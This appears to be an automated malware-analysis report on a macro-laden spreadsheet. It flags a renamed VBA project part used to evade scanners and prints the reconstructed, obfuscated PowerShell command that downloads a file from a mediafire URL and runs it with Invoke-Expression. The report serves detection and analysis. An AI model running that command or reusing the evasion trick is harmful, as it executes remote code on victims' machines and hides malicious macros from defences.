MALICIOUS
62
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The OOXML file contains a VBA macro that is obfuscated using multiple replace functions. The macro attempts to download and execute a file from the URL 'https://www.mediafire.com/file/b987f1i3css0lhl/4.txt/file'. The reconstructed command is 'iwr -uri https://www.mediafire.com/file/b987f1i3css0lhl/4.txt/file -UseB -UseDefaultCredentials | &('MMM'.replace('MMM','I')+'dildo'.replace('dildo','EX'))', indicating a downloader functionality.
Heuristics 3
-
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
VBA project inside OOXML medium OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: xl/jdfhdjf.+_--___-_-)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://www.mediafire.com/file/b987f1i3css0lhl/4.txt/file
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.basb704d320b2b52436a5240c07cfb32dd6b7c6b19737e1390a64504e38708df986 |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10382 bytes |
vbaProject_00.bin8354f7c40b6b08a6804efb86a3bfc89d43567239b6d10ca63e204daf8fd4c044 |
vba-project | OOXML VBA project: xl/jdfhdjf.+_--___-_- | 20480 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.